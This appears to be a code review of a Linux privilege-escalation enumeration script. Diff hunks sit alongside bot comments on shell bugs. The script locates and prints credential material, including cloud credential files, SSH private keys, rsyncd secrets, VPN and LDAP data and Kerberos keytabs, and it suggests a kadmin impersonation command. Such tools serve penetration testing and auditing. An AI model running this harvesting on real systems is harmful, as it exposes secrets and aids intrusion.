2>/dev/null || mongod --version 2>/dev/null) || echo_not_found "mongo binary" printf 
"$mongos\n" | while read f; do if [ "$f" ]; then echo "Found $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth*=*true|pass.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done 
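Review bot: The new Moodle block greps `"dbtype|dbhost|dbuser|dbhost|dbpass|dbport"`, which lists `dbhost` twice and omits `dbname` even though the section heading promises the database name; `grep -E "dbtype|dbhost|dbname|dbuser|dbpass|dbport" "$f"` covers what the comment describes. The Drupal and Moodle greps leave `$f` unquoted while the Wordpress branch quotes it, so a path containing whitespace splits into several arguments. `grep -i moodle/config.php` is an unanchored substring match and will also accept e.g. a `moodle/config.php.bak` from the list; `grep -i 'moodle/config\.php$'` is tighter. In the Drupal branch `echo_not_found "/default/settings.php"` is now reached only when no settings.php exists at all, so when files exist but none is under `/default/` the section prints nothing, which may be worth a fallback message.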
@@ -1733,34 +1898,36 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Supervisord conf file printf $Y"[+] "$GREEN"Searching supervisord configuration file\n"$NC - supervisor=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'supervisord\.conf') - if [ "$supervisor" ]; then - printf "$supervisor\n" - printf "$supervisor\n" | while read f; do cat "$f" 2>/dev/null | grep "port.*=\|username.*=\|password=.*" | sed -E "s,port|username|password,${C}[1;31m&${C}[0m,"; done + supervisorf=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'supervisord\.conf') + if [ "$supervisorf" ]; then + printf "$supervisorf\n" | while read f; do + echo "Found $f"; + cat "$f" 2>/dev/null | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port|username|password,${C}[1;31m&${C}[0m,"; + done else echo_not_found "supervisord.conf" fi echo "" #-- SI) Cesi conf file - cesi=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'cesi\.conf') + cesi=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cesi\.conf') printf $Y"[+] "$GREEN"Searching cesi configuration file\n"$NC if [ "$cesi" ]; then printf "$cesi\n" - printf "$cesi\n" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -E "s,username|password|database,${C}[1;31m&${C}[0m,"; done + printf "$cesi\n" | while read f; do cat "$f" 2>/dev/null | grep "username.*=\|password.*=\|host.*=\|port.*=\|database.*=" | sed -${E} "s,username|password|database,${C}[1;31m&${C}[0m,"; done else echo_not_found "cesi.conf" fi echo "" #-- SI) Rsyncd conf file - rsyncd=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS 
$FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'rsyncd\.conf|rsyncd\.secrets') + rsyncd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'rsyncd\.conf|rsyncd\.secrets') printf $Y"[+] "$GREEN"Searching Rsyncd config file\n"$NC if [ "$rsyncd" ]; then printf "$rsyncd\n" | while read f; do printf "$f\n" if [ `echo "$f" | grep -i "secrets"` ]; then - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m," fi echo "" done @@ -1769,7 +1936,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Hostapd conf file printf $Y"[+] "$GREEN"Searching Hostapd config file\n"$NC - hostapd=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'hostapd\.conf') + hostapd=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'hostapd\.conf') if [ "$hostapd" ]; then printf $Y"[+] "$GREEN"Hostapd conf was found\n"$NC printf "$hostapd\n" 
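Review bot: The new `supervisorf=$(echo "$FIND_VAR\n$FIND_ETC\n…" | grep -E 'supervisord\.conf')` relies on `echo` turning `\n` into a newline, which bash does not do by default (dash/`sh` and `echo -e` do), so if this script ends up running under bash the list stays on one line and the grep returns either nothing or the whole list; the shebang is outside this chunk, so this is inferred. `printf '%s\n' "$FIND_VAR" "$FIND_ETC" "$FIND_HOME" "$FIND_TMP" "$FIND_USR" "$FIND_OPT" "$FIND_PRIVATE" "$FIND_APPLICATIONS" "$FIND_MNT" | grep -E 'supervisord\.conf'` emits one line per variable regardless of shell and keeps path content out of the format string. The same construct is introduced for cesi and rsyncd in this hunk and in the hostapd, anaconda, vnc/ldap/ovpn, cloud-credentials, kerberos, knock, logstash, elasticsearch, vault, couchdb and redis hunks below, so the same replacement applies there. The enclosing `if [ "`echo $CHECKS | grep SofI`" ]` block starts and ends outside this hunk.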
@@ -1789,7 +1956,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Anaconda-ks conf files printf $Y"[+] "$GREEN"Searching Anaconda-ks config files\n"$NC - anaconda=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'anaconda-ks\.cfg') + anaconda=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'anaconda-ks\.cfg') if [ "$anaconda" ]; then printf "$anaconda\n" printf "$anaconda\n" | while read f; do cat "$f" 2>/dev/null | grep "rootpw" | sed "s,rootpw.*,${C}[1;31m&${C}[0m,"; done 
@@ -1799,34 +1966,34 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) VNC files printf $Y"[+] "$GREEN"Searching .vnc directories and their passwd files\n"$NC - vnc=$(echo "$FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_USERS" | grep -E '\.vnc') + vnc=$(echo "$FIND_DIR_HOME\n$FIND_DIR_USERS\n$FIND_DIR_MNT" | grep -E '\.vnc') if [ "$vnc" ]; then printf "$vnc\n" - printf "$vnc\n" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$vnc\n" | while read d; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done else echo_not_found ".vnc" fi echo "" #-- SI) LDAP directories printf $Y"[+] "$GREEN"Searching ldap directories and their hashes\n"$NC - ldap=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'ldap$') + ldap=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'ldap$') if [ "$ldap" ]; then printf "$ldap\n" echo "The password hash is from the {SSHA} to 'structural'"; - printf "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -E "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done + printf "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done else echo_not_found "ldap" fi echo "" #-- SI) .ovpn files printf $Y"[+] "$GREEN"Searching .ovpn files and credentials\n"$NC - ovpn=$(echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.ovpn') + ovpn=$(echo 
"$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.ovpn') if [ "$ovpn" ]; then printf "$ovpn\n" printf "$ovpn\n" | while read f; do if [ -r "$f" ]; then echo "Checking $f:" - cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -E "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -${E} "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; fi done else echo_not_found ".ovpn" 
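Review bot: In the ldap branch, `printf "$ldap" | while read d` has no trailing newline, so `read` drops the last (or only) directory, and `cat "$d/*.bdb"` quotes the glob so only a file literally named `*.bdb` would be read; both are context lines the commit leaves as-is while changing the same pipeline to `sed -${E}`. `printf "$ldap\n" | while read d; do cat "$d"/*.bdb 2>/dev/null | …` fixes both without touching the rest of the pipeline. The enclosing section continues past the end of this hunk.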
@@ -1835,13 +2002,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) ssh files printf $Y"[+] "$GREEN"Searching ssl/ssh files\n"$NC - ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') - certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') + ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') + certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') if [ "$certsb4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $certsb4 2>/dev/null`; fi - certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_MNT $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') + certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v 
'^/usr/lib/.*') + clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') sshagents=$(echo "$FIND_TMP" | grep -E 'agent.*') - homesshconfig=$(echo "$FIND_HOME $FIND_ROOT $FIND_USERS" | grep -E 'config' | grep "ssh") + homesshconfig=$(echo "$FIND_HOME $FIND_USR" | grep -E 'config' | grep "ssh") sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" hostsallow="`ls /etc/hosts.allow 2>/dev/null`" 
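Review bot: The rewritten `ssh=`, `certsb4=`, `certsbin=` and `clientcert=` assignments still join the FIND_* variables with spaces, unlike the rest of this commit which moved to one entry per line; if those variables hold multi-line find output, the last path of one variable and the first of the next share a line, and that line is then matched or excluded as a unit by the `grep -E` and `grep -E -v '^/usr/share/.*'` filters, so the exclusion of system certificate paths can miss entries. Using the same one-per-line form as the other hunks (`printf '%s\n' "$FIND_VAR" "$FIND_ETC" … | grep -E …`) keeps every filter per-path. `homesshconfig` now reads `$FIND_HOME $FIND_USR` where the old line had `$FIND_ROOT $FIND_USERS`; if `$FIND_USERS` was intended rather than `$FIND_USR`, the search of additional user homes is silently dropped, worth confirming.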
@@ -1850,11 +2017,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf "$ssh\n" fi - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -E "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," + grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," if [ "$TIMEOUT" ]; then privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` - privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /home 2>/dev/null` + privatekeyfileshome=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null` privatekeyfilesroot=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null` privatekeyfilesmnt=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null` else 
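Review bot: The sed highlight pattern on the sshd_config line keeps the typo `FordwardAgent.*es`, so a `ForwardAgent yes` entry is never coloured even though the commit rewrites that line; change it to `sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|ForwardAgent.*es,${C}[1;31m&${C}[0m,"`. `grep -rl … $HOMESEARCH 2>/dev/null` is left unquoted, which is right only if `$HOMESEARCH` is meant to word-split into several directories (its definition is outside this chunk); a comment such as `# HOMESEARCH is a space-separated directory list, intentionally unquoted` would stop a later cleanup from quoting it. The surrounding `if [ "$TIMEOUT" ]` block continues past the end of this hunk.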
@@ -1863,11 +2030,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - printf "Possible private SSH keys were found!\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi + printf "Possible private SSH keys were found!\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi fi if [ "$certsb4_grep" ] || [ "$certsbin" ]; then echo " --> Some certificates were found (out limited):" 
@@ -1889,24 +2056,24 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$homesshconfig" ]; then echo " --> Some home ssh config file was found" printf "$homesshconfig\n" - printf "$homesshconfig\n" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -E "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done + printf "$homesshconfig\n" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -${E} "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done fi if [ "$hostsdenied" ]; then echo " --> /etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;32m&${C}[0m," + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;32m&${C}[0m," echo "" fi if [ "$hostsallow" ]; then echo " --> /etc/hosts.allow file found, read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," + cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," fi echo "" 
@@ -1914,20 +2081,20 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` if [ "$pamssh" ]; then - cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" #-- SI) Cloud keys printf $Y"[+] "$GREEN"Searching Cloud credentials (AWS, Azure, GC)\n"$NC - cloudcreds=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') + cloudcreds=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') if [ "$cloudcreds" ]; then printf "$cloudcreds\n" | while read f; do if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs - printf "Trying to read $f\n" | sed -E "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" + printf "Trying to read $f\n" | sed -${E} "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" if [ -r "$f" ]; then - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi echo "" fi 
@@ -1938,7 +2105,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) NFS exports printf $Y"[+] "$GREEN"NFS exports?\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC - if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -E "s,insecure,${C}[1;31m&${C}[0m," + if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -${E} "s,insecure,${C}[1;31m&${C}[0m," else echo_not_found "/etc/exports" fi echo "" 
@@ -1946,27 +2113,49 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Kerberos printf $Y"[+] "$GREEN"Searching kerberos conf files and tickets\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt\n"$NC - krb5=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'krb5\.conf') - if [ "$krb5" ]; then - printf "$krb5\n" | while read f; do - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep default_ccache_name | sed -E "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + kadmin_exists="`command -v kadmin`" + klist_exists="`command -v klist`" + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${C}[1;31m&${C}[0m,"; fi + if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi + + krb5=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'krb5\.conf|krb5.keytab|\.k5login') + printf "$krb5\n" | while read f; do + if [ -r "$f" ]; then + if [ "`echo \"$f\" | grep .k5login`" ]; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + elif [ "`echo \"$f\" | grep keytab`" ]; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${C}[1;31m&${C}[0m,g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null 
#This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif [ "`echo \"$f\" | grep krb5.conf`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null fi - done - else echo_not_found "krb5.conf" - fi + fi + done ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" klist 2>/dev/null || echo_not_found "klist" echo "" #-- SI) kibana printf $Y"[+] "$GREEN"Searching Kibana yaml\n"$NC - kibana=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'kibana\.y.*ml') + kibana=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'kibana\.y.*ml') if [ "$kibana" ]; then printf "$kibana\n" printf "$kibana\n" | while read f; do if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -E "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; fi done else echo_not_found "kibana.yml" 
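Review bot: The `elif [ "`echo \"$f\" | grep kadm5.acl`" ]` branch is unreachable, because `$krb5` is built with `grep -E 'krb5\.conf|krb5.keytab|\.k5login'` and a kadm5.acl path never passes that filter; either add `|kadm5\.acl` to that grep or drop the branch. The old `if [ "$krb5" ] … else echo_not_found "krb5.conf"` guard was removed, so an empty list now produces no output at all; `[ "$krb5" ] || echo_not_found "krb5.conf"` before the loop keeps the section consistent with its neighbours. `ls -l "/tmp/krb5cc*" …` quotes the glob, so only a file literally named `krb5cc*` is ever listed and the `|| echo_not_found "tickets kerberos"` fallback fires even when caches exist — `ls -l /tmp/krb5cc* "/var/lib/sss/db/ccache_*" …` with the glob unquoted is what the fallback presumes. The early `klist` call in `if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi` runs without `2>/dev/null`, unlike every other probe in this section, so its error text ends up in the report.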
